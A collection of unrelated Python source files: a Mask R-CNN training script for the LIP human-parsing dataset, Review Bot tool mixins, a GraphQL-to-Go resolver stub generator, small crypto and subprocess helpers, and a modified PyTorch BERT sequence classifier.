DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs")
COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
############################################################
# Configurations
############################################################
class HumanConfig(Config):
    """Configuration for training on the LIP dataset.
    Derives from the base Config class and overrides some values.
    """
    # Give the configuration a recognizable name
    NAME = "human"
    # One image per GPU on a single GPU: effective batch size of 1.
    IMAGES_PER_GPU = 1
    GPU_COUNT = 1
    # Number of classes (including background)
    NUM_CLASSES = 1 + 19  # 1 Background + 19 Parsing Categories
    # # Reduce training ROIs per image because the images are small and have
    # # few objects. Aim to allow ROI sampling to pick 33% positive ROIs.
    TRAIN_ROIS_PER_IMAGE = 33
    # Number of training steps per epoch
    STEPS_PER_EPOCH = 100
    # Skip detections with < 95% confidence
    DETECTION_MIN_CONFIDENCE = 0.95
############################################################
# Dataset
############################################################
class HumanDataset(utils.Dataset):
    """LIP human-parsing dataset loader for Mask R-CNN.

    Expects the layout ``<root>/<subset>/<subset>_images/*.jpg`` with
    per-pixel label maps in ``<root>/<subset>/<subset>_segmentations/*.png``
    and an id list in ``<root>/<subset>/<subset>_id.txt``.
    """

    def load_human(self, dataset_dir, subset):
        """Load a subset of the LIP dataset.
        dataset_dir: Root directory of the dataset.
        subset: Subset to load: train or val
        """
        # Add the 19 LIP parsing classes (background is implicit).
        self.add_class("human", 1, "Hat")
        self.add_class("human", 2, "Hair")
        self.add_class("human", 3, "Glove")
        self.add_class("human", 4, "Sunglasses")
        self.add_class("human", 5, "UpperCloths")
        self.add_class("human", 6, "Dress")
        self.add_class("human", 7, "Coat")
        self.add_class("human", 8, "Socks")
        self.add_class("human", 9, "Pants")
        self.add_class("human", 10, "Jumpsuits")
        self.add_class("human", 11, "Scarf")
        self.add_class("human", 12, "Skirt")
        self.add_class("human", 13, "Face")
        self.add_class("human", 14, "Left-arm")
        self.add_class("human", 15, "Right-arm")
        self.add_class("human", 16, "Left-leg")
        self.add_class("human", 17, "Right-leg")
        self.add_class("human", 18, "Left-shoe")
        self.add_class("human", 19, "Right-shoe")
        # Train or validation dataset?
        assert subset in ["train", "val"]
        dataset_dir = os.path.join(dataset_dir, subset)
        dataset_list = os.path.join(dataset_dir, "{}_id.txt".format(subset))
        # Use a context manager: the original leaked the file handle by
        # rebinding `f` to the contents without ever closing the file.
        with open(dataset_list, 'r') as list_file:
            image_ids = list_file.read().splitlines()
        # Drop images whose segmentation contains only background.
        image_ids = self.check_seg(image_ids, dataset_dir, subset)
        for img in image_ids:
            # Get Image Information
            image_path = os.path.join(dataset_dir, "{}_images/{}.jpg".format(subset, img))
            self.add_image(
                "human",
                image_id=img,
                path=image_path,
                subset=subset)

    def load_mask(self, image_id):
        """Generate instance masks for an image.
        Returns:
         masks: A bool array of shape [height, width, instance count] with
             one mask per instance.
         class_ids: a 1D array of class IDs of the instance masks.
        """
        info = self.image_info[image_id]
        seg_dir = os.path.join(os.path.dirname(os.path.dirname(info['path'])),
                               "{}_segmentations".format(info['subset']))
        # Read the label map; each unique gray value is one parsing class.
        img_seg = cv.imread(os.path.join(seg_dir, info['id'] + ".png"))
        img_seg = cv.cvtColor(img_seg, cv.COLOR_BGR2GRAY)
        classes_seg = np.unique(img_seg)
        mask = []
        class_id = []
        for i in range(len(classes_seg)):
            if i == 0:
                # Skip the first unique value (background).
                continue
            img_seg2 = img_seg.copy()
            img_seg2[img_seg2 != classes_seg[i]] = 0
            # `bool` instead of the deprecated np.bool alias
            # (removed in NumPy >= 1.24).
            mask.append(img_seg2.astype(bool))
            class_id.append(classes_seg[i])
        if class_id:
            mask = np.stack(mask, axis=2).astype(bool)
            class_id = np.array(class_id, dtype=np.int32)
        # NOTE(review): when no foreground class exists, plain lists are
        # returned; check_seg filters such images out beforehand.
        return mask, class_id

    def image_reference(self, image_id):
        """Return the path of the image."""
        info = self.image_info[image_id]
        if info["source"] == "human":
            return info["path"]
        else:
            # Delegate to the parent class; the original dropped the
            # parent's return value (and used the fragile
            # super(self.__class__, self) form).
            return super().image_reference(image_id)

    def check_seg(self, data_list, dataset_dir, subset):
        """Return the ids from data_list whose segmentation has more than
        one unique value (i.e. contains at least one foreground class)."""
        seg_dir = os.path.join(dataset_dir, "{}_segmentations".format(subset))
        filtered_list = []
        for img_id in data_list:
            img_seg = cv.imread(os.path.join(seg_dir, img_id + ".png"))
            img_seg = cv.cvtColor(img_seg, cv.COLOR_BGR2GRAY)
            if len(np.unique(img_seg)) != 1:
                filtered_list.append(img_id)
        return filtered_list
def train(model):
    """Train the model.

    Runs a three-stage schedule: network heads, then ResNet stage 4 and up,
    then all layers at a reduced learning rate.
    NOTE(review): relies on the module-level ``args`` and ``config`` globals
    set in the __main__ block — this function cannot be called standalone.
    """
    # Training dataset.
    dataset_train = HumanDataset()
    dataset_train.load_human(args.dataset, "train")
    dataset_train.prepare()
    # Validation dataset
    dataset_val = HumanDataset()
    dataset_val.load_human(args.dataset, "val")
    dataset_val.prepare()
    # *** This training schedule is an example. Update to your needs ***
    # Since we're using a very small dataset, and starting from
    # COCO trained weights.
    # Augmentation: horizontal flip with 50% probability.
    augmentation = imgaug.augmenters.Fliplr(0.5)
    print("Training network heads")
    model.train(dataset_train, dataset_val,
                learning_rate=config.LEARNING_RATE,
                epochs=40,
                layers='heads',
                augmentation=augmentation)
    # Fine tune Resnet4 and up layers
    # Passing layers="all" trains all layers. You can also
    # pass a regular expression to select which layers to
    # train by name pattern.
    print("Fine Tune Resnet4 and up")
    model.train(dataset_train, dataset_val,
                learning_rate=config.LEARNING_RATE,
                epochs=120,
                layers="4+",
                augmentation=augmentation)
    print("Fine Tune all layers")
    model.train(dataset_train, dataset_val,
                learning_rate=config.LEARNING_RATE / 10,
                epochs=160,
                layers="all",
                augmentation=augmentation)
############################################################
# Training
############################################################
if __name__ == '__main__':
    import argparse
    # Parse command line arguments
    parser = argparse.ArgumentParser(
        description='Train Mask R-CNN to detect human parsing.')
    parser.add_argument("command",
                        metavar="<command>",
                        help="'train' or 'splash'")
    parser.add_argument('--dataset', required=False,
                        metavar="/path/to/human/dataset/",
                        help='Directory of the human dataset')
    parser.add_argument('--weights', required=True,
                        metavar="/path/to/weights.h5",
                        help="Path to weights .h5 file or 'coco'")
    parser.add_argument('--logs', required=False,
                        default=DEFAULT_LOGS_DIR,
                        metavar="/path/to/logs/",
                        help='Logs and checkpoints directory (default=logs/)')
    args = parser.parse_args()
    # Validate arguments
    if args.command == "train":
        assert args.dataset, "Argument --dataset is required for training"
    elif args.command == "splash":
        # NOTE(review): --image/--video are not defined on the parser above,
        # so this assert would raise AttributeError — confirm whether the
        # splash arguments were dropped when this script was adapted.
        assert args.image or args.video,\
               "Provide --image or --video to apply color splash"
    print("Weights: ", args.weights)
    print("Dataset: ", args.dataset)
    print("Logs: ", args.logs)
    # Configurations
    if args.command == "train":
        config = HumanConfig()
    else:
        class InferenceConfig(HumanConfig):
            # Set batch size to 1 since we'll be running inference on
            # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
            GPU_COUNT = 1
            IMAGES_PER_GPU = 1
        config = InferenceConfig()
    config.display()
    # Create model
    if args.command == "train":
        model = modellib.MaskRCNN(mode="training", config=config,
                                  model_dir=args.logs)
    else:
        model = modellib.MaskRCNN(mode="inference", config=config,
                                  model_dir=args.logs)
    # Select weights file to load
    if args.weights.lower() == "coco":
        weights_path = COCO_WEIGHTS_PATH
        # Download weights file
        if not os.path.exists(weights_path):
            utils.download_trained_weights(weights_path)
    elif args.weights.lower() == "last":
        # Find last trained weights
        weights_path = model.find_last()
    elif args.weights.lower() == "imagenet":
        # Start from ImageNet trained weights
        weights_path = model.get_imagenet_weights()
    else:
        weights_path = args.weights
    # Load weights
    print("Loading weights ", weights_path)
    if args.weights.lower() == "coco":
        # Exclude the last layers because they require a matching
        # number of classes
        model.load_weights(weights_path, by_name=True, exclude=[
            "mrcnn_class_logits", "mrcnn_bbox_fc",
            "mrcnn_bbox", "mrcnn_mask"])
    else:
        model.load_weights(weights_path, by_name=True)
    # Train or evaluate
    if args.command == "train":
        train(model)
    else:
        print("'{}' is not recognized. "
              "Use 'train'".format(args.command))
|
"""Tests for privacy.util.logging"""
from privacy.util import logging
def test_mock_logger():
    """Subclassing LoggingClass must expose a stdlib Logger via ``.log``."""
    class MockLogger(logging.LoggingClass):
        pass

    mock_log = MockLogger().log
    assert isinstance(mock_log, logging.logging.Logger)
|
"""Useful mixins for code checking tools.
Version Added:
3.0
"""
from __future__ import unicode_literals
import os
import re
from reviewbot.config import config
from reviewbot.utils.filesystem import chdir, ensure_dirs_exist
from reviewbot.utils.process import execute
from reviewbot.utils.text import split_comma_separated
# Python 3.4+ includes glob.escape, but older versions do not. Optimistically,
# we'll use glob.escape, and we'll fall back on a custom implementation.
try:
    from glob import escape as glob_escape
except ImportError:
    _glob_escape_pattern = re.compile(r'([*?[])')

    def glob_escape(path):
        """Escape glob metacharacters in a path, like glob.escape.

        The drive portion (e.g. ``C:`` on Windows) must be left unescaped,
        so only the remainder of the path is processed. The original used
        os.path.split (directory/basename split), which dropped the path
        separator and left metacharacters in the directory part unescaped;
        os.path.splitdrive is the correct counterpart to glob.escape.
        """
        drive, path = os.path.splitdrive(path)
        return '%s%s' % (drive, _glob_escape_pattern.sub(r'[\1]', path))
class FilePatternsFromSettingMixin(object):
    """Mixin to set file patterns based on a configured tool setting.

    Subclasses can base file patterns off either a setting representing
    a comma-separated list of file patterns, or a setting representing a
    comma-separated list of file extensions. If both are provided, both will
    be checked, with the file patterns taking precedence over file extensions.

    If neither are provided by the user, the default list of file patterns
    set by the subclass (if any) will be used.

    Version Added:
        3.0
    """

    #: The name of a tool setting for a comma-separated list of extensions.
    #:
    #: Type:
    #:     unicode
    file_extensions_setting = None

    #: The name of a tool setting for a comma-separated list of patterns.
    #:
    #: Type:
    #:     unicode
    file_patterns_setting = None

    #: Whether to include default file patterns in the resulting list.
    #:
    #: Type:
    #:     boolean
    include_default_file_patterns = True

    def __init__(self, **kwargs):
        """Initialize the tool.

        Args:
            **kwargs (dict):
                Keyword arguments for the tool.
        """
        super(FilePatternsFromSettingMixin, self).__init__(**kwargs)
        settings = self.settings
        file_patterns = None
        # The patterns setting takes precedence over the extensions setting.
        if self.file_patterns_setting:
            value = settings.get(self.file_patterns_setting, '').strip()
            if value:
                file_patterns = split_comma_separated(value)
        if not file_patterns and self.file_extensions_setting:
            value = settings.get(self.file_extensions_setting, '').strip()
            # Turn each extension into a "*.ext" glob, escaping any glob
            # metacharacters contained in the extension itself.
            file_patterns = [
                '*.%s' % glob_escape(ext.lstrip('.'))
                for ext in split_comma_separated(value)
            ]
        if file_patterns:
            if self.include_default_file_patterns and self.file_patterns:
                file_patterns += self.file_patterns
            # De-duplicate, sort, and drop empty patterns.
            self.file_patterns = [
                file_pattern
                for file_pattern in sorted(set(file_patterns))
                if file_pattern
            ]
class FullRepositoryToolMixin(object):
    """Mixin for tools that need access to the entire repository.

    This will take care of checking out a copy of the repository and applying
    patches from the diff being reviewed.

    Version Added:
        3.0:
        This replaced the legacy :py:class:`reviewbot.tools.RepositoryTool`.
    """

    # Tools using this mixin require a working directory for the checkout.
    working_directory_required = True

    def execute(self, review, repository=None, base_commit_id=None, **kwargs):
        """Perform a review using the tool.

        Args:
            review (reviewbot.processing.review.Review):
                The review object.

            repository (reviewbot.repositories.Repository, optional):
                The repository.

            base_commit_id (unicode, optional):
                The ID of the commit that the patch should be applied to.

            **kwargs (dict):
                Additional keyword arguments (e.g. tool-specific settings)
                passed through to the parent class's execute method.
        """
        repository.sync()
        working_dir = repository.checkout(base_commit_id)
        # Patch all the files first.
        with chdir(working_dir):
            for f in review.files:
                self.logger.debug('Patching %s', f.dest_file)
                ensure_dirs_exist(os.path.abspath(f.dest_file))
                with open(f.dest_file, 'wb') as fp:
                    fp.write(f.patched_file_contents)
                f.patched_file_path = f.dest_file
            # Now run the tool for everything.
            super(FullRepositoryToolMixin, self).execute(review, **kwargs)
class JavaToolMixin(object):
    """Mixin for Java-based tools.

    Version Added:
        3.0
    """

    #: Main class to call to run the Java application.
    #:
    #: Type:
    #:     unicode
    java_main = None

    #: The key identifying the classpaths to use.
    #:
    #: Type:
    #:     unicode
    java_classpaths_key = None

    # All Java tools require the java executable.
    exe_dependencies = ['java']

    def check_dependencies(self):
        """Verify the tool's dependencies are installed.

        This will invoke the base class's dependency checking, ensuring that
        :command:`java` is available, and will then attempt to run the
        configured Java class (:py:attr:`java_main`), checking that it could
        be found.

        Returns:
            bool:
            True if all dependencies for the tool are satisfied. If this
            returns False, the worker will not listen for this Tool's queue,
            and a warning will be logged.
        """
        if not super(JavaToolMixin, self).check_dependencies():
            return False
        classpath = \
            config['java_classpaths'].get(self.java_classpaths_key, [])
        if not self._check_java_classpath(classpath):
            return False
        # Launch the class once; if the classpath is wrong, java reports
        # that the main class could not be found or loaded.
        output = execute(self._build_java_command(),
                         ignore_errors=True)
        return 'Could not find or load main class' not in output

    def build_base_command(self, **kwargs):
        """Build the base command line used to review files.

        Args:
            **kwargs (dict, unused):
                Additional keyword arguments.

        Returns:
            list of unicode:
            The base command line.
        """
        # Bug fix: the original forwarded **kwargs to _build_java_command(),
        # which accepts no arguments, raising TypeError whenever a keyword
        # argument was actually passed. The kwargs are documented as unused.
        return self._build_java_command()

    def _build_java_command(self):
        """Return the base Java command for running the class.

        This will build the class path and command line for running
        :py:attr:`java_main`.

        Returns:
            list of unicode:
            The base command line for running the Java class.
        """
        classpath = ':'.join(
            config['java_classpaths'].get(self.java_classpaths_key, []))
        cmdline = [config['exe_paths']['java']]
        if classpath:
            cmdline += ['-cp', classpath]
        cmdline.append(self.java_main)
        return cmdline

    def _check_java_classpath(self, classpath):
        """Return whether all entries in a classpath exist.

        Args:
            classpath (list of unicode):
                The classpath locations.

        Returns:
            bool:
            ``True`` if all entries exist on the filesystem. ``False`` if
            one or more are missing (or the classpath is empty).
        """
        if not classpath:
            return False
        for path in classpath:
            if not path or not os.path.exists(path):
                return False
        return True
|
import re
import random
import os
# Go template for one resolver method.
methodTmpl = """
func (r *{$typeName}Resolver) {$method}() {$fieldType} {
    {$value}
    return {$res}
}
"""
# Go template for the resolver file header (package + struct).
tmplHeader = """
package resolver
{$import}
type {$typeName}Resolver struct {
    //m *model.{$typeName}
}
"""
importTmplOrigin = 'import (\n    //"pinjihui.com/pinjihui/model"'


# Plain functions instead of lambda assignments (PEP 8 E731).
def first_lower(s):
    """Lower-case the first character of s; '' stays ''."""
    return s[:1].lower() + s[1:] if s else ''


def first_upper(s):
    """Upper-case the first character of s; '' stays ''."""
    return s[:1].upper() + s[1:] if s else ''


# Matches a GraphQL "type Name { ... }" block.
pattern = re.compile(r'type (\w+) \{\s+?([^\}]+)\n\}')
# Matches one field line: name, scalar-or-list type, optional "!" markers.
fieldPattern = re.compile(r'(\w+?): (\w+|\[(\w+)(!)?\])(!)?')
# Matches a GraphQL "enum Name { ... }" block.
enumPattern = re.compile(r'enum (\w+) \{([^\}]+)\}')
# GraphQL scalar -> Go type.
basicTypeMap = {"Int": "int32", "Float": 'float64', "String": "string", "Boolean": "bool"}
def initValue(typeName, enumType=None, enumsMap=None):
    """Return a Go literal used to initialise a stub value of *typeName*.

    Args:
        typeName: the Go type name ("int32", "string", "enum", ...).
        enumType: the GraphQL enum name when typeName == "enum".
        enumsMap: mapping of enum name -> list of member names; the first
            member is used as the stub value.

    Returns:
        A Go source snippet; unknown types fall back to the zero-value
        composite literal ``TypeName{}``.
    """
    typeMapValue = {
        "int32": "int32(3)",
        "float64": "0.0",
        "string": '"test string"',
        "bool": "false",
        # Conditional is lazy, so enumsMap is only touched when enumType is given.
        "enum": '"%s"' % enumsMap[enumType][0] if enumType is not None else "",
        "graphql.ID": 'graphql.ID("xjauwkahsi92h1j")',
        "graphql.Time, error": 'time.Parse(time.RFC3339, "2018-04-01 12:04:56.539453")',
    }
    return typeMapValue.get(typeName, "%s{}" % typeName)
def hump2underline(hunp_str):
    """Convert a camelCase/PascalCase string to all-lowercase snake_case.

    A boundary is any lowercase letter or digit followed by an uppercase
    letter; an underscore is inserted between the two, then the whole
    string is lowercased.
    """
    boundary = re.compile(r'([a-z]|\d)([A-Z])')
    # \1_\2 keeps both boundary characters, separated by an underscore.
    return boundary.sub(r'\1_\2', hunp_str).lower()
def generate(file, out_dir="/home/wangbo/go/src/pinjihui.com/pinjihui/resolver/"):
    """Generate a Go resolver stub for the GraphQL type defined in *file*.

    Args:
        file: path to a ``.graphql`` file whose first definition is a
            ``type X { ... }`` block (enum definitions may follow).
        out_dir: directory the generated ``<snake_case_name>.go`` file is
            written to. Defaults to the previously hard-coded project path
            so existing callers are unaffected.

    Returns:
        0 on success, -1 if no ``type`` definition was found.
    """
    tmpl = tmplHeader

    def shouldReturnPoint(isRequire, goFieldType):
        # Optional fields and nested resolvers are returned by pointer.
        return isRequire is None or goFieldType.endswith("Resolver")

    with open(file, 'r') as f:
        data = f.read()
    # Strip trailing '#' comments before parsing.
    data = re.sub(r'\s+?#.*$', "", data, 0, re.M)
    res = re.match(pattern, data)
    if res is None:
        return -1
    typeName = res.group(1)
    print("typeName:" + typeName)
    enumsTypes = re.findall(enumPattern, data)
    enums = [x[0] for x in enumsTypes]
    enumsMap = {e[0]: e[1].strip().split("\n ") for e in enumsTypes}
    print("enums:", enumsMap)
    print(res.group(2).split("\n"))
    # ROBUSTNESS: skip blank/unparsable field lines instead of crashing
    # with AttributeError when re.match returns None.
    matches = [re.match(fieldPattern, x.strip()) for x in res.group(2).split("\n")]
    fields = [m.groups() for m in matches if m]
    shouldImportTime = False
    should_import_graphql_go = False
    for field in fields:
        # field = (name, raw type, element type if list, list '!', field '!')
        methodTmplNew = methodTmpl
        gqlFieldType = field[1]
        isArray = False
        if gqlFieldType.startswith("["):
            gqlFieldType = field[2]
            isArray = True
        value = None
        if gqlFieldType in basicTypeMap:
            goFieldType = basicTypeMap[gqlFieldType]
        elif gqlFieldType in enums:
            goFieldType = "string"
            # Shuffle so the stub picks a random enum member each run.
            random.shuffle(enumsMap[gqlFieldType])
            value = initValue('enum', gqlFieldType, enumsMap)
        elif gqlFieldType == "ID":
            goFieldType = "graphql.ID"
            value = 'graphql.ID("xjauwkahsi92h1j")'
            should_import_graphql_go = True
        elif gqlFieldType == "Time":
            shouldImportTime = True
            should_import_graphql_go = True
            goFieldType = "graphql.Time, error"
        else:
            # Any other object type maps to a nested resolver.
            goFieldType = first_lower(gqlFieldType) + "Resolver"
        if value is None:
            value = initValue(goFieldType)
        if isArray:
            refSybol = ""
            if shouldReturnPoint(field[3], goFieldType):
                refSybol = "&"
                goFieldType = "*" + goFieldType
            goFieldType = "[]" + goFieldType
            # Build a slice and fill it with stub element values.
            value = "make(%s, 3)" % goFieldType + """
    for i := range res {
        v := %s
        res[i] = %sv
    }""" % (value, refSybol)
        if shouldReturnPoint(field[4], goFieldType):
            goFieldType = "*" + goFieldType
        returnExpr = "res"
        if gqlFieldType == "Time":
            # Multi-value return: parenthesise the type and propagate the error.
            goFieldType = "(" + goFieldType + ")"
            value = "res, err := " + value
            returnExpr = "graphql.Time{Time: res}, err"
        else:
            value = "res := " + value
        if shouldReturnPoint(field[4], goFieldType):
            returnExpr = '&' + returnExpr
        method = "ID" if field[0] == 'id' else first_upper(field[0])
        methodTmplNew = methodTmplNew.replace("{$method}", method)
        methodTmplNew = methodTmplNew.replace("{$res}", returnExpr)
        methodTmplNew = methodTmplNew.replace("{$value}", value)
        tmpl += methodTmplNew.replace("{$fieldType}", goFieldType)
    importTmpl = importTmplOrigin
    if shouldImportTime:
        importTmpl += '\n "time"'
    if should_import_graphql_go:
        importTmpl += '\n "github.com/graph-gophers/graphql-go"'
    importTmpl += "\n)"
    tmpl = tmpl.replace("{$import}", first_lower(importTmpl))
    tmpl = tmpl.replace("{$typeName}", first_lower(typeName))
    # GENERALIZED: previously a hard-coded absolute path on one dev machine.
    resolverFile = os.path.join(out_dir, hump2underline(typeName) + ".go")
    with open(resolverFile, 'w') as rf:
        rf.write(tmpl)
    return 0
if __name__ == '__main__':
    # NOTE(review): the schema directory is hard-coded to a developer
    # machine — consider taking it from sys.argv.
    dirname = "/home/wangbo/go/src/pinjihui.com/pinjihui/schema/type"
    # Pick up every .graphql type file except user* and page_info.graphql.
    typeFiles = [os.path.join(dirname, name) for name in os.listdir(dirname)
                 if name.endswith(".graphql") and not name.startswith("user") and not name == "page_info.graphql"]
    for file in typeFiles:
        print("generate %s" % file)
        generate(file)
|
from decimal import ROUND_DOWN, Decimal
from subprocess import check_output
def crypto_truncate(amount):
    """Truncate *amount* down to 8 decimal places (satoshi precision).

    Uses ROUND_DOWN so the value is never rounded up.
    """
    value = Decimal(amount)
    precision = Decimal("0.00000001")
    return value.quantize(precision, rounding=ROUND_DOWN)
def run(args, split="\n"):
    """Run *args* as a subprocess and return its stdout split on *split*.

    Raises subprocess.CalledProcessError if the command exits non-zero.
    """
    raw = check_output(args)
    text = raw.decode("utf-8")
    return text.split(split)
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch BERT model."""
from __future__ import absolute_import, division, print_function, unicode_literals
import copy
import json
import math
import os
import shutil
import tarfile
import tempfile
import sys
from io import open
import torch
from torch import nn
from torch.nn import CrossEntropyLoss
from pytorch_pretrained_bert.file_utils import cached_path, WEIGHTS_NAME, CONFIG_NAME
from pytorch_pretrained_bert.modeling import ACT2FN, BertConfig, BertIntermediate, \
BertSelfAttention, BertPreTrainedModel
class BertLayerNorm(nn.Module):
    """Layer normalization over the last dimension with learnable scale/shift."""

    def __init__(self, hidden_size, eps=1e-12):
        super(BertLayerNorm, self).__init__()
        self.weight = nn.Parameter(torch.ones(hidden_size))
        self.bias = nn.Parameter(torch.zeros(hidden_size))
        # Added inside the sqrt to avoid division by zero.
        self.variance_epsilon = eps

    def forward(self, x):
        mean = x.mean(-1, keepdim=True)
        centered = x - mean
        variance = centered.pow(2).mean(-1, keepdim=True)
        normalized = centered / torch.sqrt(variance + self.variance_epsilon)
        return self.weight * normalized + self.bias
class BertLayerNormNoVar(nn.Module):
    """Mean-only normalization: subtract the mean, then scale and shift.

    Unlike standard LayerNorm there is no division by the standard
    deviation; ``variance_epsilon`` is kept only for interface parity.
    """

    def __init__(self, hidden_size, eps=1e-12):
        super(BertLayerNormNoVar, self).__init__()
        self.weight = nn.Parameter(torch.ones(hidden_size))
        self.bias = nn.Parameter(torch.zeros(hidden_size))
        self.variance_epsilon = eps

    def forward(self, x):
        centered = x - x.mean(-1, keepdim=True)
        return self.weight * centered + self.bias
class BertEmbeddings(nn.Module):
    """Construct the embeddings from word, position and token_type embeddings.

    In this variant position and token-type embeddings are deliberately
    disabled: only word embeddings are returned. The embedding modules are
    still created so checkpoints with their weights load unchanged.
    """

    def __init__(self, config, glove=None, vocab=None):
        # glove/vocab are accepted for interface compatibility but unused here.
        super(BertEmbeddings, self).__init__()
        self.word_embeddings = nn.Embedding(config.vocab_size, config.embedding_size, padding_idx=0)
        self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.embedding_size)
        self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.embedding_size)
        self.config = config

    def forward(self, input_ids, token_type_ids=None):
        """Return word embeddings of shape (batch, seq, embedding_size).

        Args:
            input_ids: LongTensor of token ids, shape (batch, seq).
            token_type_ids: unused (token-type embedding is disabled).
        """
        # PERF FIX: the original computed position and token-type embeddings
        # and then discarded them (the sum was commented out). Skip the dead
        # compute entirely — the returned value is identical.
        return self.word_embeddings(input_ids)
class BertSelfOutput(nn.Module):
    """Projects attention output, applies dropout, residual add, LayerNorm.

    config.layer_norm selects the normalization flavor: "no_var" uses the
    mean-only variant, "no" skips normalization, anything else (or absent)
    uses standard BertLayerNorm.
    """

    def __init__(self, config):
        super(BertSelfOutput, self).__init__()
        self.config = config
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        if getattr(config, "layer_norm", None) == "no_var":
            self.LayerNorm = BertLayerNormNoVar(config.hidden_size, eps=1e-12)
        else:
            self.LayerNorm = BertLayerNorm(config.hidden_size, eps=1e-12)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states, input_tensor):
        out = self.dense(hidden_states)
        out = self.dropout(out)
        # Residual connection only when the widths line up.
        if out.shape[-1] == input_tensor.shape[-1]:
            out = out + input_tensor
        if getattr(self.config, "layer_norm", None) != "no":
            out = self.LayerNorm(out)
        return out
class BertAttention(nn.Module):
    """Self-attention followed by its projection/residual output block.

    NOTE(review): ``input_size`` is accepted but never used — verify callers
    before removing it.
    """

    def __init__(self, config, input_size):
        super(BertAttention, self).__init__()
        self.self = BertSelfAttention(config)
        self.output = BertSelfOutput(config)

    def forward(self, input_tensor, attention_mask):
        attended = self.self(input_tensor, attention_mask)
        return self.output(attended, input_tensor)
class BertOutput(nn.Module):
    """Feed-forward output block: project down, dropout, residual, LayerNorm.

    Normalization flavor follows config.layer_norm as elsewhere in this file.
    """

    def __init__(self, config):
        super(BertOutput, self).__init__()
        self.config = config
        self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
        if getattr(config, "layer_norm", None) == "no_var":
            self.LayerNorm = BertLayerNormNoVar(config.hidden_size, eps=1e-12)
        else:
            self.LayerNorm = BertLayerNorm(config.hidden_size, eps=1e-12)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states, input_tensor):
        projected = self.dense(hidden_states)
        projected = self.dropout(projected)
        projected = projected + input_tensor
        if getattr(self.config, "layer_norm", None) != "no":
            projected = self.LayerNorm(projected)
        return projected
class BertLayer(nn.Module):
    """One transformer block: self-attention -> intermediate -> output."""

    def __init__(self, config, layer_id):
        # layer_id is accepted for interface parity; it is not stored.
        super(BertLayer, self).__init__()
        self.input_size = config.hidden_size
        self.attention = BertAttention(config, self.input_size)
        self.intermediate = BertIntermediate(config)
        self.output = BertOutput(config)

    def forward(self, hidden_states, attention_mask):
        attended = self.attention(hidden_states, attention_mask)
        expanded = self.intermediate(attended)
        return self.output(expanded, attended)
class BertEncoder(nn.Module):
    """Stack of BertLayer transformer blocks."""

    def __init__(self, config):
        super(BertEncoder, self).__init__()
        self.layer = nn.ModuleList(
            [BertLayer(config, idx) for idx in range(config.num_hidden_layers)])

    def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True):
        """Run all layers; return per-layer outputs, or a 1-element list of the last."""
        collected = []
        for block in self.layer:
            hidden_states = block(hidden_states, attention_mask)
            if output_all_encoded_layers:
                collected.append(hidden_states)
        if not output_all_encoded_layers:
            collected.append(hidden_states)
        return collected
class BertPooler(nn.Module):
    """Pools a sequence by projecting the first token's state through tanh."""

    def __init__(self, config):
        super(BertPooler, self).__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        self.activation = nn.Tanh()

    def forward(self, hidden_states):
        # "Pool" the model by taking only the first token's hidden state.
        cls_state = hidden_states[:, 0]
        return self.activation(self.dense(cls_state))
class BertModelFromEmbeddings(BertPreTrainedModel):
    """BERT encoder + pooler that consumes precomputed embeddings directly."""

    def __init__(self, config):
        super(BertModelFromEmbeddings, self).__init__(config)
        self.encoder = BertEncoder(config)
        self.pooler = BertPooler(config)
        self.apply(self.init_bert_weights)

    def forward(self, embeddings, extended_attention_mask):
        """Encode *embeddings* and return the pooled first-token representation."""
        layers = self.encoder(embeddings, extended_attention_mask)
        return self.pooler(layers[-1])
class BertForSequenceClassificationFromEmbeddings(BertPreTrainedModel):
    """Classifier head operating on precomputed embeddings.

    Projects embeddings to hidden_size, optionally LayerNorms them, runs the
    BERT encoder/pooler and a final linear classifier producing logits.
    """

    def __init__(self, config, num_labels=2):
        super(BertForSequenceClassificationFromEmbeddings, self).__init__(config)
        self.num_labels = num_labels
        self.bert = BertModelFromEmbeddings(config)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.classifier = nn.Linear(config.hidden_size, num_labels)
        self.linear_in = nn.Linear(config.embedding_size, config.hidden_size)
        # BUG FIX: the rest of this file guards config.layer_norm with
        # hasattr(); reading it unconditionally here raised AttributeError
        # for configs without the attribute. getattr() keeps behavior for
        # configs that define it and defaults to None (standard LayerNorm).
        self.layer_norm = getattr(config, "layer_norm", None)
        if self.layer_norm == "no_var":
            self.LayerNorm = BertLayerNormNoVar(config.embedding_size, eps=1e-12)
        else:
            self.LayerNorm = BertLayerNorm(config.embedding_size, eps=1e-12)
        self.apply(self.init_bert_weights)

    def forward(self, embeddings, extended_attention_mask):
        """Return classification logits for the given embeddings and mask."""
        embeddings = self.linear_in(embeddings)
        if self.layer_norm != "no":
            embeddings = self.LayerNorm(embeddings)
        embeddings = self.dropout(embeddings)
        pooled_output = self.bert(embeddings, extended_attention_mask)
        pooled_output = self.dropout(pooled_output)
        logits = self.classifier(pooled_output)
        return logits
class BertForSequenceClassification(BertPreTrainedModel):
    """Token-id front end: embeds inputs then delegates to the embeddings head."""

    def __init__(self, config, num_labels=2, glove=None, vocab=None):
        super(BertForSequenceClassification, self).__init__(config)
        self.model_from_embeddings = BertForSequenceClassificationFromEmbeddings(
            config, num_labels
        )
        self.num_labels = num_labels
        self.embeddings = BertEmbeddings(config, glove=glove, vocab=vocab)
        self.apply(self.init_bert_weights)

